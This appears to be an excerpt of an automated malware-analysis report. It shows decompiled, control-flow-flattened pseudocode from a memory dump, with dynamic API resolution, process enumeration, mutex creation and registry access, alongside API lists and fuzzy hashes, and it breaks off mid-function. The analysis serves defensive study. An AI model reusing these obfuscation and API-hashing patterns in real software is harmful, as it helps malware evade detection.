                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b74af6
                                                                                                                                                        0x00b74658
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7465a
                                                                                                                                                        0x00b7465f
                                                                                                                                                        0x00b74667
                                                                                                                                                        0x00b7466f
                                                                                                                                                        0x00b7467c
                                                                                                                                                        0x00b746ab
                                                                                                                                                        0x00b746ab
                                                                                                                                                        0x00b746b0
                                                                                                                                                        0x00b746b9
                                                                                                                                                        0x00b746ca
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7467e
                                                                                                                                                        0x00b74685
                                                                                                                                                        0x00b7469b
                                                                                                                                                        0x00b7469f
                                                                                                                                                        0x00b746a2
                                                                                                                                                        0x00b746a5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b74685
                                                                                                                                                        0x00b7467c
                                                                                                                                                        0x00b746d7
                                                                                                                                                        0x00b74773
                                                                                                                                                        0x00b748b3
                                                                                                                                                        0x00b74e0a
                                                                                                                                                        0x00b748b9
                                                                                                                                                        0x00b748be
                                                                                                                                                        0x00b74e12
                                                                                                                                                        0x00b74e1b
                                                                                                                                                        0x00b748c4
                                                                                                                                                        0x00b748c9
                                                                                                                                                        0x00b748d4
                                                                                                                                                        0x00b748d9
                                                                                                                                                        0x00b748e9
                                                                                                                                                        0x00b748ee
                                                                                                                                                        0x00b748f3
                                                                                                                                                        0x00b748f9
                                                                                                                                                        0x00b74905
                                                                                                                                                        0x00b7490b
                                                                                                                                                        0x00b74911
                                                                                                                                                        0x00b7491d
                                                                                                                                                        0x00b7491f
                                                                                                                                                        0x00b7493b
                                                                                                                                                        0x00b74941
                                                                                                                                                        0x00b74947
                                                                                                                                                        0x00b7494c
                                                                                                                                                        0x00b74952
                                                                                                                                                        0x00b74961
                                                                                                                                                        0x00b74964
                                                                                                                                                        0x00b74964
                                                                                                                                                        0x00b748c9
                                                                                                                                                        0x00b748be
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b748b3
                                                                                                                                                        0x00b7477e
                                                                                                                                                        0x00b74a7b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b74a82
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b74a88
                                                                                                                                                        0x00b74a95
                                                                                                                                                        0x00b74aa0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b74aa0
                                                                                                                                                        0x00b74789
                                                                                                                                                        0x00b74c7a
                                                                                                                                                        0x00b74c7f
                                                                                                                                                        0x00b74c87
                                                                                                                                                        0x00b74c8f
                                                                                                                                                        0x00b74c97
                                                                                                                                                        0x00b74ca4
                                                                                                                                                        0x00b74cd1
                                                                                                                                                        0x00b74cd1
                                                                                                                                                        0x00b74cd6
                                                                                                                                                        0x00b74cdf
                                                                                                                                                        0x00b74cf0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b74cf0
                                                                                                                                                        0x00b74ca8
                                                                                                                                                        0x00b74cc4
                                                                                                                                                        0x00b74cc8
                                                                                                                                                        0x00b74ccb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7478f
                                                                                                                                                        0x00b74794
                                                                                                                                                        0x00b7479a
                                                                                                                                                        0x00b747a3
                                                                                                                                                        0x00b747a3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b74794
                                                                                                                                                        0x00b74789
                                                                                                                                                        0x00b746e2
                                                                                                                                                        0x00b747e1
                                                                                                                                                        0x00b74d15
                                                                                                                                                        0x00b74d1f
                                                                                                                                                        0x00b74d25
                                                                                                                                                        0x00b74d2b
                                                                                                                                                        0x00b74d30
                                                                                                                                                        0x00b74d32
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b74d32
                                                                                                                                                        0x00b747ec
                                                                                                                                                        0x00b74d3c
                                                                                                                                                        0x00b74d44
                                                                                                                                                        0x00b74d4f
                                                                                                                                                        0x00b74d5a
                                                                                                                                                        0x00b74d65
                                                                                                                                                        0x00b74d78
                                                                                                                                                        0x00b74dab
                                                                                                                                                        0x00b74dab
                                                                                                                                                        0x00b74db0
                                                                                                                                                        0x00b74dbe
                                                                                                                                                        0x00b74dd2
                                                                                                                                                        0x00b74de1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b74de1
                                                                                                                                                        0x00b74d7c
                                                                                                                                                        0x00b74d9b
                                                                                                                                                        0x00b74da2
                                                                                                                                                        0x00b74da5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b74d7c
                                                                                                                                                        0x00b747f7
                                                                                                                                                        0x00b747fd
                                                                                                                                                        0x00b74802
                                                                                                                                                        0x00b74802
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b747f7
                                                                                                                                                        0x00b746ed
                                                                                                                                                        0x00b749ab
                                                                                                                                                        0x00b74e32
                                                                                                                                                        0x00b74e37
                                                                                                                                                        0x00b749b1
                                                                                                                                                        0x00b749b6
                                                                                                                                                        0x00b749bc
                                                                                                                                                        0x00b749c1
                                                                                                                                                        0x00b749c1
                                                                                                                                                        0x00b749b6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b749ab
                                                                                                                                                        0x00b746f8
                                                                                                                                                        0x00b74afe
                                                                                                                                                        0x00b74b0d
                                                                                                                                                        0x00b74b12
                                                                                                                                                        0x00b74b17
                                                                                                                                                        0x00b74b1f
                                                                                                                                                        0x00b74b2a
                                                                                                                                                        0x00b74b35
                                                                                                                                                        0x00b74b48
                                                                                                                                                        0x00b74b83
                                                                                                                                                        0x00b74b8c
                                                                                                                                                        0x00b74b91
                                                                                                                                                        0x00b74b96
                                                                                                                                                        0x00b74b9f
                                                                                                                                                        0x00b74bae
                                                                                                                                                        0x00b74bc0
                                                                                                                                                        0x00b74bc8
                                                                                                                                                        0x00b74bda
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b74bda
                                                                                                                                                        0x00b74b51
                                                                                                                                                        0x00b74b70
                                                                                                                                                        0x00b74b77
                                                                                                                                                        0x00b74b7a
                                                                                                                                                        0x00b74b7d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b74b51
                                                                                                                                                        0x00b74703
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b74709
                                                                                                                                                        0x00b74709
                                                                                                                                                        0x00b74712
                                                                                                                                                        0x00b74717
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b74717
                                                                                                                                                        0x00b74703
                                                                                                                                                        0x00b7461c

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00B7CDB9: RtlAllocateHeap.NTDLL(?,9FD7756B,079849AE,0701B759,?,00B80A77), ref: 00B7CE20
                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00B7491D
                                                                                                                                                        • Process32First.KERNEL32 ref: 00B74952
                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE ref: 00B74A08
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.482142058.0000000000B71000.00000020.00000001.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.482132217.0000000000B70000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.482167503.0000000000B84000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.482175737.0000000000B87000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateChangeCloseCreateFindFirstHeapNotificationProcess32SnapshotToolhelp32
                                                                                                                                                        • String ID: n;8
                                                                                                                                                        • API String ID: 1884103251-2108076282
                                                                                                                                                        • Opcode ID: fcc6a3db49a038e27a310dbb4d983f34b63867fa87f5d81bbfd4e42c1535ee92
                                                                                                                                                        • Instruction ID: d09e484ab03514c23665ce6c14c9a1bb5ff3557bc735c25e848d4d775763a41d
                                                                                                                                                        • Opcode Fuzzy Hash: fcc6a3db49a038e27a310dbb4d983f34b63867fa87f5d81bbfd4e42c1535ee92
                                                                                                                                                        • Instruction Fuzzy Hash: 3D12F7B23186C48ADB748B59A48032FB7E1E3D6745F14C46AEB9ED7B58CB39C8419F01
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00B7EFD3, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                        			E00B7EFD3(intOrPtr __edx, long long __rax, long long __rcx, void* __rdx, void* __r8, void* __r11) {
				long long _v72;
				long long _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				long long _v104;
				long long _v112;
				intOrPtr _t24;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t44;
				void* _t46;
				long long _t56;
				long long _t61;
				void* _t63;
				long long _t64;
				long long _t66;
				void* _t68;
				void* _t69;
				long long _t70;

				_t69 = __r11;
				_t68 = __r8;
				_t63 = __rdx;
				_t62 = __rcx;
				_t56 = __rax;
				_t66 = __rcx;
				_v84 = r8d;
				_t34 =  ==  ? 0x64798daa : 0x23a3853d;
				_v88 =  ==  ? 0x64798daa : 0x23a3853d;
				r13d = 0x8f34f1b0;
				r13d =  ==  ? 0x84c104ed : r13d;
				_v92 = __edx;
				r14d = 0x71c9cf43;
				r14d =  ==  ? 0xf3019199 : r14d;
				_t24 = 0xf82b818e;
				while(1) {
					L1:
					_t35 = _t24;
					if(_t24 <= 0x18bc41aa) {
						break;
					}
					if(_t35 > 0x38ab292f) {
						if(_t35 > 0x65e67dfa) {
							if(_t35 == 0x71c9cf43) {
								r12d = 0;
								_t64 = _t66;
								_t24 = r13d;
								continue;
							}
							_t24 = _t35;
							if(_t35 != 0x65e67dfb) {
								continue;
							}
							return _t24;
						}
						if(_t35 == 0x38ab2930) {
							_t56 = _v112;
							_t24 = 0x98ea932f;
							if( *_t56 != 0) {
								_t24 = 0x33675366;
							}
							L40:
							_t61 = _v104;
							continue;
						}
						_t24 = _t35;
						if(_t35 == 0x64798daa) {
							_t24 = 0x65e67dfb;
						}
						continue;
					}
					if(_t35 > 0x2f447a17) {
						if(_t35 == 0x2f447a18) {
							_t24 = 0xfaff49ef;
							continue;
						}
						_t24 = _t35;
						if(_t35 != 0x33675366) {
							continue;
						}
						r8d = 0x18d1ea71;
						r9d = 0x2b;
						E00B7FAD7(1, 0, _t56, _t62);
						_t62 = _v112;
						 *_t56();
						_t61 = _t56;
						_t24 = 0x18bc41ab;
						if(_t61 == 0) {
							continue;
						}
						L32:
						_t24 = 0x98ea932f;
						continue;
					}
					if(_t35 == 0x18bc41ab) {
						r8d = 0x84161500;
						r9d = 2;
						E00B7FAD7(1, 0, _t56, _t62);
						_t62 = _v112; // executed
						LoadLibraryA(??); // executed
						goto L32;
					} else {
						_t24 = _t35;
						if(_t35 == 0x23a3853d) {
							_t62 = _v72;
							E00B7F29F(_v84, _t44, _t46, _v72, _t63, _t68, _t69);
							_v80 = _t56;
							_t24 = 0xe79882b1;
							if(_v80 != 0) {
								_t24 = 0x2f447a18;
							}
						}
						continue;
					}
				}
				if(_t35 <= 0xe79882b0) {
					if(_t35 == 0x84c104ed) {
						E00B7F5B9(_v92);
						_t64 = _t56;
						_t24 = 0x8f34f1b0;
						r12d = 0;
						goto L1;
					}
					if(_t35 == 0x8f34f1b0) {
						_v104 = _t70;
						_v112 = _t64;
						_t62 = _v104;
						_t43 = 0x38ab2930;
						if(_v112 == _t61) {
							_t43 = 0x98ea932f;
						}
						_t24 =  ==  ? _t43 : 0x98ea932f;
						goto L40;
					}
					_t24 = _t35;
					if(_t35 == 0x98ea932f) {
						_v72 = _t61;
						_t24 = _v88;
					}
				} else {
					if(_t35 > 0xf82b818d) {
						_t24 = r14d;
						if(_t35 != 0xf82b818e) {
							_t24 = _t35;
							if(_t35 == 0xfaff49ef) {
								_t24 = 0x65e67dfb;
							}
						}
					} else {
						if(_t35 == 0xe79882b1) {
							_t24 = 0xfaff49ef;
						} else {
							_t24 = _t35;
							if(_t35 == 0xf3019199) {
								_t24 = 0x8f34f1b0;
								_t70 =  *0xb85030;
								_t64 = _t66;
							}
						}
					}
				}
			}























                                                                                                                                                        0x00b7efd3
                                                                                                                                                        0x00b7efd3
                                                                                                                                                        0x00b7efd3
                                                                                                                                                        0x00b7efd3
                                                                                                                                                        0x00b7efd3
                                                                                                                                                        0x00b7efe3
                                                                                                                                                        0x00b7efe6
                                                                                                                                                        0x00b7eff8
                                                                                                                                                        0x00b7effb
                                                                                                                                                        0x00b7f007
                                                                                                                                                        0x00b7f00d
                                                                                                                                                        0x00b7f011
                                                                                                                                                        0x00b7f01d
                                                                                                                                                        0x00b7f023
                                                                                                                                                        0x00b7f027
                                                                                                                                                        0x00b7f02c
                                                                                                                                                        0x00b7f02c
                                                                                                                                                        0x00b7f02c
                                                                                                                                                        0x00b7f033
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7f03b
                                                                                                                                                        0x00b7f0d2
                                                                                                                                                        0x00b7f1b4
                                                                                                                                                        0x00b7f27d
                                                                                                                                                        0x00b7f280
                                                                                                                                                        0x00b7f283
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7f283
                                                                                                                                                        0x00b7f1ba
                                                                                                                                                        0x00b7f1c2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7f29e
                                                                                                                                                        0x00b7f29e
                                                                                                                                                        0x00b7f0de
                                                                                                                                                        0x00b7f208
                                                                                                                                                        0x00b7f210
                                                                                                                                                        0x00b7f215
                                                                                                                                                        0x00b7f217
                                                                                                                                                        0x00b7f217
                                                                                                                                                        0x00b7f264
                                                                                                                                                        0x00b7f264
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7f264
                                                                                                                                                        0x00b7f0e4
                                                                                                                                                        0x00b7f0ec
                                                                                                                                                        0x00b7f0f7
                                                                                                                                                        0x00b7f0f7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7f0ec
                                                                                                                                                        0x00b7f047
                                                                                                                                                        0x00b7f13b
                                                                                                                                                        0x00b7f26e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7f273
                                                                                                                                                        0x00b7f141
                                                                                                                                                        0x00b7f149
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7f15b
                                                                                                                                                        0x00b7f161
                                                                                                                                                        0x00b7f167
                                                                                                                                                        0x00b7f16c
                                                                                                                                                        0x00b7f16f
                                                                                                                                                        0x00b7f171
                                                                                                                                                        0x00b7f174
                                                                                                                                                        0x00b7f17c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7f1f2
                                                                                                                                                        0x00b7f1f2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7f1f2
                                                                                                                                                        0x00b7f053
                                                                                                                                                        0x00b7f1d9
                                                                                                                                                        0x00b7f1df
                                                                                                                                                        0x00b7f1e5
                                                                                                                                                        0x00b7f1ea
                                                                                                                                                        0x00b7f1ed
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7f059
                                                                                                                                                        0x00b7f059
                                                                                                                                                        0x00b7f061
                                                                                                                                                        0x00b7f063
                                                                                                                                                        0x00b7f06c
                                                                                                                                                        0x00b7f071
                                                                                                                                                        0x00b7f07c
                                                                                                                                                        0x00b7f081
                                                                                                                                                        0x00b7f083
                                                                                                                                                        0x00b7f083
                                                                                                                                                        0x00b7f081
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7f061
                                                                                                                                                        0x00b7f053
                                                                                                                                                        0x00b7f090
                                                                                                                                                        0x00b7f107
                                                                                                                                                        0x00b7f222
                                                                                                                                                        0x00b7f227
                                                                                                                                                        0x00b7f22a
                                                                                                                                                        0x00b7f22f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7f22f
                                                                                                                                                        0x00b7f113
                                                                                                                                                        0x00b7f237
                                                                                                                                                        0x00b7f23c
                                                                                                                                                        0x00b7f241
                                                                                                                                                        0x00b7f246
                                                                                                                                                        0x00b7f257
                                                                                                                                                        0x00b7f259
                                                                                                                                                        0x00b7f259
                                                                                                                                                        0x00b7f261
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7f261
                                                                                                                                                        0x00b7f119
                                                                                                                                                        0x00b7f121
                                                                                                                                                        0x00b7f127
                                                                                                                                                        0x00b7f12c
                                                                                                                                                        0x00b7f12c
                                                                                                                                                        0x00b7f092
                                                                                                                                                        0x00b7f098
                                                                                                                                                        0x00b7f184
                                                                                                                                                        0x00b7f18d
                                                                                                                                                        0x00b7f193
                                                                                                                                                        0x00b7f19b
                                                                                                                                                        0x00b7f1a1
                                                                                                                                                        0x00b7f1a6
                                                                                                                                                        0x00b7f19b
                                                                                                                                                        0x00b7f09e
                                                                                                                                                        0x00b7f0a4
                                                                                                                                                        0x00b7f1fc
                                                                                                                                                        0x00b7f0aa
                                                                                                                                                        0x00b7f0aa
                                                                                                                                                        0x00b7f0b2
                                                                                                                                                        0x00b7f0b8
                                                                                                                                                        0x00b7f0bd
                                                                                                                                                        0x00b7f0c4
                                                                                                                                                        0x00b7f0c4
                                                                                                                                                        0x00b7f0b2
                                                                                                                                                        0x00b7f0a4
                                                                                                                                                        0x00b7f098

                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,EA203201,079849AE,E8F2AD3B,00000095,?,?,00000001,00B7FC0A,?,?,079849AE,E8F2AD3B), ref: 00B7F1ED
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.482142058.0000000000B71000.00000020.00000001.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.482132217.0000000000B70000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.482167503.0000000000B84000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.482175737.0000000000B87000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                        • String ID: fSg3$fSg3
                                                                                                                                                        • API String ID: 1029625771-263991881
                                                                                                                                                        • Opcode ID: 3d0265caa5a6fd1482380c2ac525c3344cc87223c6ea81e310f15978c367fdea
                                                                                                                                                        • Instruction ID: d992b451459dcea755c91fe542be9a0a42ee6aabbb465db5727d32307fe76f25
                                                                                                                                                        • Opcode Fuzzy Hash: 3d0265caa5a6fd1482380c2ac525c3344cc87223c6ea81e310f15978c367fdea
                                                                                                                                                        • Instruction Fuzzy Hash: 09511621314542C6DA298939B4A023961E0FB547E4F68D0BAFE6FDBF26DA2DCD408719
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00B7CDB9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                        			E00B7CDB9(void* __ecx, long long __rax) {
				long long _v48;
				void* _t5;
				void* _t21;
				void* _t23;
				long long _t29;
				void* _t36;
				void* _t40;

				_t29 = __rax;
				_t21 = __ecx;
				_t23 =  ==  ? 0x79212036 : 0xea203201;
				_t5 = 0x534cbae1;
				r14d = 0xe8f2ad3b;
				L1:
				while(1) {
					if(_t5 <= 0x4eab221e) {
						if(_t5 == 0xe8f2ad3b) {
							_t5 = 0x4eab221f;
						} else {
							if(_t5 == 0xea203201) {
								r8d = 0x54cac072;
								r9d = 0x95;
								E00B7FAD7(1, _t21, _t29, _t33);
								 *_t29();
								_v48 = _t29;
								_t5 =  ==  ? r14d : 0x2f3e82e;
							} else {
								if(_t5 == 0x2f3e82e) {
									r8d = 0x12cfae43;
									r9d = 0x96;
									E00B7FAD7(1, _t21, _t29, _t33);
									RtlAllocateHeap(??, ??, ??); // executed
									_t33 = _t29;
									E00B7C8BC(0, _t29, _t29, _t36, _t40);
									_t5 = 0xe8f2ad3b;
								}
							}
						}
						continue;
					}
					if(_t5 == 0x4eab221f) {
						return _t5;
					}
					if(_t5 == 0x534cbae1) {
						_t5 = _t23;
					} else {
						if(_t5 == 0x79212036) {
							_t5 = 0x4eab221f;
						}
					}
				}
			}










                                                                                                                                                        0x00b7cdb9
                                                                                                                                                        0x00b7cdc3
                                                                                                                                                        0x00b7cdd1
                                                                                                                                                        0x00b7cdd4
                                                                                                                                                        0x00b7cdd9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7cddf
                                                                                                                                                        0x00b7cde4
                                                                                                                                                        0x00b7cdeb
                                                                                                                                                        0x00b7ce57
                                                                                                                                                        0x00b7cded
                                                                                                                                                        0x00b7cdf2
                                                                                                                                                        0x00b7ce6b
                                                                                                                                                        0x00b7ce71
                                                                                                                                                        0x00b7ce77
                                                                                                                                                        0x00b7ce7c
                                                                                                                                                        0x00b7ce7e
                                                                                                                                                        0x00b7ce8e
                                                                                                                                                        0x00b7cdf4
                                                                                                                                                        0x00b7cdf9
                                                                                                                                                        0x00b7ce07
                                                                                                                                                        0x00b7ce0d
                                                                                                                                                        0x00b7ce13
                                                                                                                                                        0x00b7ce20
                                                                                                                                                        0x00b7ce25
                                                                                                                                                        0x00b7ce2d
                                                                                                                                                        0x00b7ce32
                                                                                                                                                        0x00b7ce32
                                                                                                                                                        0x00b7cdf9
                                                                                                                                                        0x00b7cdf2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7cdeb
                                                                                                                                                        0x00b7ce3e
                                                                                                                                                        0x00b7cead
                                                                                                                                                        0x00b7cead
                                                                                                                                                        0x00b7ce45
                                                                                                                                                        0x00b7ce99
                                                                                                                                                        0x00b7ce47
                                                                                                                                                        0x00b7ce4c
                                                                                                                                                        0x00b7ce4e
                                                                                                                                                        0x00b7ce53
                                                                                                                                                        0x00b7ce4c
                                                                                                                                                        0x00b7ce45

                                                                                                                                                        APIs
                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,9FD7756B,079849AE,0701B759,?,00B80A77), ref: 00B7CE20
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.482142058.0000000000B71000.00000020.00000001.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.482132217.0000000000B70000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.482167503.0000000000B84000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.482175737.0000000000B87000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                        • String ID: 6 !y$6 !y
                                                                                                                                                        • API String ID: 1279760036-2075727267
                                                                                                                                                        • Opcode ID: ace1e1f7354e43219aaef62e33cf0548d855f00e3c2b989caf3d60ba01407e6d
                                                                                                                                                        • Instruction ID: ac04208b8d358e47ad67d9e017c3b27fc581f985d01e19b3764f2a961b346d61
                                                                                                                                                        • Opcode Fuzzy Hash: ace1e1f7354e43219aaef62e33cf0548d855f00e3c2b989caf3d60ba01407e6d
                                                                                                                                                        • Instruction Fuzzy Hash: D4117D117855484DDB34255A688076A4CC18B98BD8F28C57E6F3DDBB08D529DD529309
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00B73A22, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63synchronizationCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                        			E00B73A22(long long __rax, intOrPtr __rcx, long long* __rdx) {
				long long _v32;
				intOrPtr _v36;
				signed char _t12;
				void* _t18;
				void* _t26;
				long long _t31;
				long long* _t36;

				_t32 = __rcx;
				_t31 = __rax;
				_t36 = __rdx;
				r8d = 0x7ae3257e;
				r9d = 0x42;
				E00B7FAD7(1, _t26, __rax, __rcx);
				 *_t31(); // executed
				_v32 = _t31;
				r8d = 0xce1f1c4e;
				r9d = 0xc5;
				E00B7FAD7(1, _t26, _t31, __rcx);
				_v36 =  *_t31();
				_t18 = 0x953bce87;
				L1:
				while(_t18 > 0x346ca2b9) {
					if(_t18 == 0x346ca2ba) {
						r8d = 0x2db58ff7;
						r9d = 0x11;
						E00B7FAD7(1, _t26, _t31, _t32);
						_t32 = _v32;
						 *_t31();
						_t18 = 0x6b45cfdb;
						_t12 = 1;
						continue;
					}
					if(_t18 != 0x6b45cfdb) {
						continue;
					}
					return _t12 & 0x00000001;
				}
				if(_t18 == 0x953bce87) {
					_t18 =  ==  ? 0x346ca2ba : 0x263eb76d;
				} else {
					if(_t18 == 0x263eb76d) {
						_t31 = _v32;
						 *_t36 = _t31;
						_t18 = 0x6b45cfdb;
						_t12 = 0;
					}
				}
				goto L1;
			}










                                                                                                                                                        0x00b73a22
                                                                                                                                                        0x00b73a22
                                                                                                                                                        0x00b73a29
                                                                                                                                                        0x00b73a36
                                                                                                                                                        0x00b73a3c
                                                                                                                                                        0x00b73a42
                                                                                                                                                        0x00b73a4e
                                                                                                                                                        0x00b73a50
                                                                                                                                                        0x00b73a5c
                                                                                                                                                        0x00b73a62
                                                                                                                                                        0x00b73a68
                                                                                                                                                        0x00b73a6f
                                                                                                                                                        0x00b73a73
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b73a7d
                                                                                                                                                        0x00b73aac
                                                                                                                                                        0x00b73ad8
                                                                                                                                                        0x00b73ade
                                                                                                                                                        0x00b73ae4
                                                                                                                                                        0x00b73ae9
                                                                                                                                                        0x00b73aec
                                                                                                                                                        0x00b73aee
                                                                                                                                                        0x00b73af3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b73af3
                                                                                                                                                        0x00b73ab4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b73b00
                                                                                                                                                        0x00b73b00
                                                                                                                                                        0x00b73a8b
                                                                                                                                                        0x00b73ac7
                                                                                                                                                        0x00b73a8d
                                                                                                                                                        0x00b73a93
                                                                                                                                                        0x00b73a95
                                                                                                                                                        0x00b73a9a
                                                                                                                                                        0x00b73a9d
                                                                                                                                                        0x00b73aa2
                                                                                                                                                        0x00b73aa2
                                                                                                                                                        0x00b73a93
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • CreateMutexExA.KERNEL32(?,?,?,079849AE,0701B759,00B809DE), ref: 00B73A4E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.482142058.0000000000B71000.00000020.00000001.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.482132217.0000000000B70000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.482167503.0000000000B84000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.482175737.0000000000B87000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateMutex
                                                                                                                                                        • String ID: ~%z
                                                                                                                                                        • API String ID: 1964310414-678350322
                                                                                                                                                        • Opcode ID: eaccdd7afe8a9bf82b3a989abbb9c357d09fd32216fee824b4d664ec0fc315d5
                                                                                                                                                        • Instruction ID: c70d802ac920c02ba5de9ef46dcbe70d2e94c1ae166ad44d4ebd9571a79d6ed7
                                                                                                                                                        • Opcode Fuzzy Hash: eaccdd7afe8a9bf82b3a989abbb9c357d09fd32216fee824b4d664ec0fc315d5
                                                                                                                                                        • Instruction Fuzzy Hash: 66113D2331858142D73C0A1568E2B3D26D3C798BC4F18817DEDAF97F95C81ACE816702
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00B77B43, Relevance: 1.7, APIs: 1, Instructions: 213registryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 44%
                                                                                                                                                        			E00B77B43(intOrPtr __edx, long long __rax, void* __rcx) {
				long long _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				void* _v104;
				long long _v112;
				signed long long _v120;
				long long _v128;
				long long _v136;
				intOrPtr _v140;
				long long _v152;
				char _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v181;
				long long _v192;
				long long _v200;
				void* _t69;
				intOrPtr _t108;
				long long _t115;
				signed long long _t123;
				intOrPtr* _t131;
				void* _t140;
				void* _t144;
				void* _t146;
				signed long long _t147;
				long long _t148;

				_t115 = __rax;
				_t144 =  &_v168;
				_t108 = __edx;
				_t140 = __rcx;
				E00B7CDB9(0xc8, __rax);
				_v152 = _t115;
				_t131 =  &_v180;
				_v136 = _t131;
				 *_t131 = 0;
				_v128 =  &_v160;
				_v88 = _t140 + 0xb44;
				_v96 = _t140 + 0x294;
				_v104 = _t140 + 0x280;
				_v140 = _t108;
				r12d = 0xf11b687f;
				r12d =  ==  ? 0xf83e1c76 : r12d;
				r15d = 0x5c7553b0;
				r15d =  ==  ? 0xdab00bc5 : r15d;
				_t15 = _t140 + 0x5d2; // 0x5c755982
				_v112 = _t15;
				_t17 = _t140 + 0x650; // 0x5c755a00
				_t123 = _t17;
				_v120 = _t123;
				_t69 = 0xbda386ba;
				L1:
				while(1) {
					while(_t69 > 0xdab00bc4) {
						if(_t69 <= 0xf83e1c75) {
							if(_t69 == 0xdab00bc5) {
								 *((short*)(_t140 + 0x294)) = 0;
								_v180 =  *((intOrPtr*)(_t140 + 0x664));
								_t69 = 0x5c7553b0;
								_t147 = _v104;
